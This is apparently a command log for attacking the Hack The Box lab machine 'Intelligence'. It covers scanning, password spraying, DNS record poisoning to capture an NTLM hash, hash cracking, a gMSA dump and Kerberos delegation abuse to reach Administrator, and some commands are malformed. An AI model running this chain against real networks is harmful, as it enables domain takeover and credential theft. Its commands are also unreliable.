echo "10.129.95.154 intelligence.htb" | sudo tee -a /etc/hosts
nmap -A -p- -oA intelligence 10.129.95.154 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA intelligence 10.129.95.154
nmap -sU -O -p- -oA intelligence-udp 10.129.95.154
nikto -h 10.129.95.154:80
gobuster dir -k -u http://10.129.95.154/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
strings 2020-01-01-upload.pdf
cat users
Encontramos la contrasena de NewIntelligenceCorpUser9876
crackmapexec smb 10.129.95.154 -u users -p NewIntelligenceCorpUser9876
smbclient -L 10.129.95.154/ -U Tiffany.Molina
smbclient -L //10.129.95.154/ -U Tiffany.Molina
smbclient //10.129.95.154/IT -U Tiffany.Molina
cat downdetector.ps1
Tenemos que registrar nuestro dominio falso para tener acceso a root. Vemos el usuario Ted Graves.
python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -r webfake.intelligence.htb --data 10.10.14.94 10.129.95.154
hashid intelligence_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt intelligence_hash.txt
hashcat -a 3 -m 5600 intelligence_hast.txt /usr/share/wordlists/rockyou.txt --show
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
python3 /opt/impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83... -impersonate administrator
python3 /opt/impacket/examples/atexec.py -k -no-pass dc.intelligence.htb -hashes 'whoami'
python3 /opt/impacket/examples/smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass